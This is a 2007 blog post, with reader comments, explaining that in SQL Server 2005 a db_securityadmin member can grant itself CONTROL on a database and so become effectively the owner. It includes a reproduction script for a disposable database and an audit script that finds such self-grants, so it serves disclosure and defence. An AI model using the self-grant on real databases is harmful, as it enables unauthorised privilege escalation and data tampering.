SQL, Analysis Services & related stories.

db_securityadmin is very powerful and ... dangerous.

A few days ago I worked for a client who uses the following security model:

- dbo is responsible for high-level database design and maintenance;

- all database users are organized into additional database roles, one per application security group;

- a dedicated person is responsible for maintaining user security: (s)he can assign a user to one or more of these application roles. This dedicated person is a department secretary, a trusted person who has only the right to run simple SELECT statements on some tables, but who is a member of the db_securityadmin database role.

 

At first glance the security rules look appropriate and it seems nothing can go wrong. The secretary cannot change the membership of the fixed database roles such as db_datawriter; according to BOL, adding members to a fixed database role requires membership in db_owner.

 

Log in with an account that is a member of db_securityadmin and run

SELECT * FROM fn_my_permissions(N'db_name', N'DATABASE')

You will get the following list of database-level privileges (this is the list BOL documents for db_securityadmin; in practice CONNECT is listed as well, because every database user holds it):

 

--  ALTER ANY APPLICATION ROLE
--  ALTER ANY ROLE
--  CREATE SCHEMA
--  VIEW DEFINITION

 

Nothing in that list suggests the user can grant permissions. But if the same user runs

 

GRANT CONTROL TO <secretary> -- grant database control to self

 

and then runs the same query again

SELECT * FROM fn_my_permissions(N'db_name', N'DATABASE')

the result now contains every database-level permission: <secretary> holds CONTROL on the database, which is effectively the same as being dbo. The GRANT succeeds because db_securityadmin is still allowed to manage database permissions (a behaviour kept from SQL Server 2000), and nothing stops its members from naming themselves as the grantee.
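The whole escalation, reproduced in a throw-away database so it can be tested without touching a production system. This is an added example and not the script from the original post; the database name EscalationTest, the user name secretary and the table dbo.Salary are assumptions. HAS_PERMS_BY_NAME is used for the before/after check so that the script does not stop on a permission error.

```sql
-- Added example (not from the original post). Names are assumptions.
USE master;
GO
CREATE DATABASE EscalationTest;
GO
USE EscalationTest;
GO
-- Some data the secretary is supposed to be able to read but not change.
CREATE TABLE dbo.Salary (EmployeeId int PRIMARY KEY, Amount money NOT NULL);
INSERT INTO dbo.Salary VALUES (1, 1000), (2, 2000);

-- A user without a login keeps the demo self-contained; in the client's
-- environment this would be a Windows or SQL login mapped into the database.
CREATE USER secretary WITHOUT LOGIN;
GRANT SELECT ON dbo.Salary TO secretary;
EXEC sp_addrolemember N'db_securityadmin', N'secretary';
GO

-- Run the rest as the secretary.
EXECUTE AS USER = 'secretary';

-- Step 1: permissions before the grant. Expect CONNECT plus the four
-- db_securityadmin permissions, and no DELETE on the table.
SELECT permission_name FROM fn_my_permissions(N'EscalationTest', N'DATABASE');
SELECT HAS_PERMS_BY_NAME('dbo.Salary', 'OBJECT', 'DELETE') AS can_delete_before; -- 0

-- Step 2: db_securityadmin may grant database-level permissions, including
-- CONTROL, and nothing stops it from granting to itself.
GRANT CONTROL TO secretary;

-- Step 3: the same checks after the grant. CONTROL on the database implies
-- every other permission in it, so the secretary is now effectively dbo.
SELECT permission_name FROM fn_my_permissions(N'EscalationTest', N'DATABASE');
SELECT HAS_PERMS_BY_NAME('dbo.Salary', 'OBJECT', 'DELETE') AS can_delete_after;  -- 1
DELETE FROM dbo.Salary WHERE EmployeeId = 1;   -- succeeds now

REVERT;
GO
-- Clean up.
USE master;
DROP DATABASE EscalationTest;
GO
```

Run it as a sysadmin (or as the owner of a disposable database). The two HAS_PERMS_BY_NAME queries are the proof: the only thing that happened between 0 and 1 is a GRANT issued by a user whose documented permissions do not include the right to issue it.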

 

Be careful which fixed database roles you hand out, and assign only trusted people to db_securityadmin. As things stand today (SQL Server 2005), a member of db_securityadmin is effectively equal to the database owner.
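If db_securityadmin members must be treated as owners, the practical follow-up is to know who they are and whether anyone has already used the trick. The script below is an added example, not part of the original post: it walks every online database on the instance, lists the members of db_securityadmin, and lists every explicit CONTROL grant on the database itself (class 0 in sys.database_permissions), which is the trace a self-grant leaves behind. It uses only catalog views available from SQL Server 2005 onwards and is meant to be run as sysadmin.

```sql
-- Added example (not from the original post). Run as sysadmin.
SET NOCOUNT ON;
DECLARE @db sysname, @sql nvarchar(max);
DECLARE @results TABLE (
    database_name sysname,
    finding       varchar(32),
    principal     sysname,
    grantor       sysname NULL
);

DECLARE dbs CURSOR LOCAL FAST_FORWARD FOR
    SELECT name FROM sys.databases
    WHERE state_desc = 'ONLINE' AND name <> N'tempdb';

OPEN dbs;
FETCH NEXT FROM dbs INTO @db;
WHILE @@FETCH_STATUS = 0
BEGIN
    SET @sql = N'USE ' + QUOTENAME(@db) + N';
        -- 1. members of db_securityadmin in this database
        SELECT DB_NAME(), ''db_securityadmin member'', m.name, NULL
        FROM sys.database_role_members rm
        JOIN sys.database_principals r ON r.principal_id = rm.role_principal_id
        JOIN sys.database_principals m ON m.principal_id = rm.member_principal_id
        WHERE r.name = N''db_securityadmin''
        UNION ALL
        -- 2. explicit CONTROL on the database (class 0) held by anyone but dbo
        SELECT DB_NAME(), ''CONTROL on database'', p.name, g.name
        FROM sys.database_permissions dp
        JOIN sys.database_principals p ON p.principal_id = dp.grantee_principal_id
        JOIN sys.database_principals g ON g.principal_id = dp.grantor_principal_id
        WHERE dp.class = 0
          AND dp.permission_name = N''CONTROL''
          AND dp.state IN (''G'', ''W'')
          AND p.name <> N''dbo'';';
    INSERT INTO @results EXEC sp_executesql @sql;
    FETCH NEXT FROM dbs INTO @db;
END
CLOSE dbs;
DEALLOCATE dbs;

-- Compare the two findings per database: a CONTROL grantee that is also a
-- db_securityadmin member (and, worse, is recorded as its own grantor) matches
-- the scenario in the post. Revoke the grant and review the role membership.
SELECT * FROM @results ORDER BY database_name, finding, principal;
```

The CONTROL check is deliberately limited to the database securable; a db_securityadmin member can also grant itself other permissions (ALTER, TAKE OWNERSHIP, CONTROL on individual schemas or objects), so on a system where this role is in use it is worth extending the second query to every permission whose grantee and grantor are the same principal.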

In the next article I will show the potential problems in more detail.

Published Monday, January 15, 2007 1:58 AM by Igor Kovalenko


Comments

 

Vladimir said:

When should we expect this to be fixed...?

March 26, 2007 8:43 PM
 

Igor Kovalenko said:

I don't think this will be fixed soon (or at all). Security team responded that a member of "db_securityadmin" should be a trusted person.

March 27, 2007 1:55 AM
 

Vladimir said:

They should try to "sell" it to business users, who will be concerned about the security of their data...

That's not the answer; they have to admit this is a security issue and it needs to be fixed...

Nobody should be able to elevate their own privileges, otherwise it doesn't make sense to have security based only on trust..

What could happen if this account were compromised and someone was aware of this possibility of self-elevating privileges..?

I'm kind of positive they may fix it silently during the next service packs or fixes..

March 27, 2007 2:26 PM
 

SQL Server tools said:

Well, I'm not selling any tool to fix any issues or threats you already have in your SQL Server environment.

March 28, 2007 4:47 AM


About Igor Kovalenko

I've been in IT since 1991, starting my career in Unix & C development. Now I am a consultant in Microsoft Services, Russia. My areas of experience are SQL & OLAP. I've been working with Microsoft tools for more than 15 years, starting from asm 5.0 and Quick C 2.51 through (Visual) FoxPro, VB, C#... But my mission is SQL. Truthfully, I have enough knowledge of both Oracle (8, 9i) and Microsoft database technology, but it's too hard for me to cover both :-). My real data warehousing experience started with one of the largest DW implementations in Russia, using Oracle 9i, until 2002. Of course I also implemented the first part of the BI project on top of this DW using SQL AS 2000 & Crystal Reports. After that, for a year I was a senior developer, Online Services, at Dell UK, Bracknell (C++/VB/Oracle/SQL/ASP). In 2003 I was a little bit tired of the High Technology World and decided to join Deloitte, Moscow, where I was a finance analyst and a member of the Business Director Group. I really missed half of my IT knowledge at that time (only SQL & Crystal were useful), but now I perfectly know the "underground" of any Big 4 consulting company, the details of the budgeting and management process, FTE, utilization, OPTS analysis.... Hell, real accounting hell. I was excited to design and implement my first (and last) project using the Cognos EP tool. At the end of 2005 I was hired by my favorite company :-) Microsoft, and now I am working with my favorite tool: SQL Server. To keep a long story short :-).

© 2009 Microsoft Corporation. All rights reserved. Terms of Use  |  Trademarks  |  Privacy Statement